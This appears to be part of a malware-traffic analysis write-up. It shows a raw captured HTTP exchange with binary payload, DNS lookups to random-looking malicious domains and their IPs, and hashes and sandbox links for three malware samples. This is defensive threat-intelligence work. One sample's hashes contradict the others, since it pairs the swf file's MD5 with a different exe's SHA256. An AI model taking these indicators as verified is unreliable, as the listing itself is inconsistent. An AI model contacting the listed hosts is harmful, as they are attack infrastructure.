User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
./6.P.@...(.....5^..?.=..o..}...4...p.:.....?.IF3r+E.i...P.<.+.....5....mpz......wpB..I..h....O.sn..=..fX.+..n.U5...".....u..:>JiS..1&..5.[v...B9...n.....?..y....[...qO.7zafv..L$.,s.c..m.Db;."..+r.=......P.._...!3.jt........b.A....d%.Ck..PDj3*...,...N#`.RQ.....^.J. ..X.C.C..8.+bzh..j..=H4.e.....eW.~.).`.kP....w...H....4..`Ui!vai).\.l...x.N....N.D.CA..z.K]:..........J.;...cQ...e..L^.^..}...R...0..G\.+..x..#...6.i.Qf....6..-._t.........C.\.!.z`l.-O.=.Vt..l.#...`.}q.r.?...2..,.....8.
.z.....p...|K.?.0~9y.5g`./...U0....bA..p.7...l....r.>B..vb......,L..>.......*y^f...
3&K..]:5;.B."...q.z'.%.b..7..W..7.(.Sb.{}....A...d3..3.l2!......(Z...~......E....F.{k(k..I......[2..........j`....Yn.d.m.....<....-....
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 24 Nov 2015 16:16:57 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
......L.<a. }.&...|.
One thing to mention as well, there were a fair good amount of DNS calls made that looked pretty abnormal. Please note that Chrome will do DNS pre-fetching which could cause some odd looking domains to be looked up as well (http://groups.google.com/a/chromium.org/forum/#!topic/chromium-discuss/F70-k_PGhEg). Here is a list of FQDNs that looked odd to me from the PCAP:
11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com 11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name 11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com 11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1 11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com 11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1 11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com 11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name 11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com 12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1 12001 178.268719 10.1.25.119 52742 8.8.4.4 53 DNS Standard query 0x1cf7 A lnhxwmhoyjxqmtgn9u.com 12002 178.348164 8.8.4.4 53 10.1.25.119 52742 DNS Standard query response 0x1cf7 A 127.0.1.1 12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com 12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name 12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com 12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name 12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com 12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90 12163 179.663157 10.1.25.119 50005 8.8.4.4 53 DNS Standard query 0xb4c8 A rnhbhnlmpvvdt.com 12194 179.748103 8.8.4.4 53 10.1.25.119 50005 DNS Standard query response 0xb4c8 A 166.78.145.90 12303 179.968038 10.1.25.119 61287 8.8.4.4 53 DNS Standard query 0xb54b A qtllebdadvitdim.com 12334 180.059365 8.8.4.4 53 10.1.25.119 61287 DNS Standard query response 0xb54b No such name 12335 180.060984 10.1.25.119 56286 8.8.4.4 53 DNS Standard query 0x9da2 A wyvpeiyaxycznuia6.com 12372 180.155660 8.8.4.4 53 10.1.25.119 56286 DNS Standard query response 0x9da2 No such name 12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com 12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229 12415 180.252274 10.1.25.119 51862 8.8.4.4 53 DNS Standard query 0x7ebc A ncqauqvqqhhzpc.com 12453 180.348244 8.8.4.4 53 10.1.25.119 51862 DNS Standard query response 0x7ebc A 95.211.205.229 13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk 13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226
Results from Snort via Security Onion (ET rules):
=================================================
VirusTotal links for links and files found:
===========================================
File Name: neuhaus-who.olp.swf
MD5: e7540e851a7334a3ce068e772b205ece
SHA256: d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9
First submission: 2015-12-04 14:39:03 UTC
Detection ratio: 6 / 55
Virustotal link: http://www.virustotal.com/en/file/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9/analysis/1449239943/
Hybrid-Analysis link (Windows 7 x64): http://www.hybrid-analysis.com/sample/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=2
Hybrid-Analysis link (Windows 7 x32): http://www.hybrid-analysis.com/sample/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=1
Malwr link: http://malwr.com/analysis/ZTgzN2QxODY5ZjcxNGZlYWFjYzM1ZDQxMDUxNjQ2MjM/
File Name: neuhaus-literature.disco.exe
MD5: 478294cf3367385f8715198fa27d0305
SHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
First submission: 2015-12-04 15:26:43 UTC
Detection ratio: 0 / 55
Virustotal link: http://www.virustotal.com/en/file/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8/analysis/1449242803/
File Name: neuhaus-yes.wbxml.exe
MD5: e7540e851a7334a3ce068e772b205ece
SHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
First submission: 2015-12-04 14:39:03 UTC
Detection ratio: 0 / 55
Virustotal link: http://www.virustotal.com/en/file/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8/analysis/1449242803/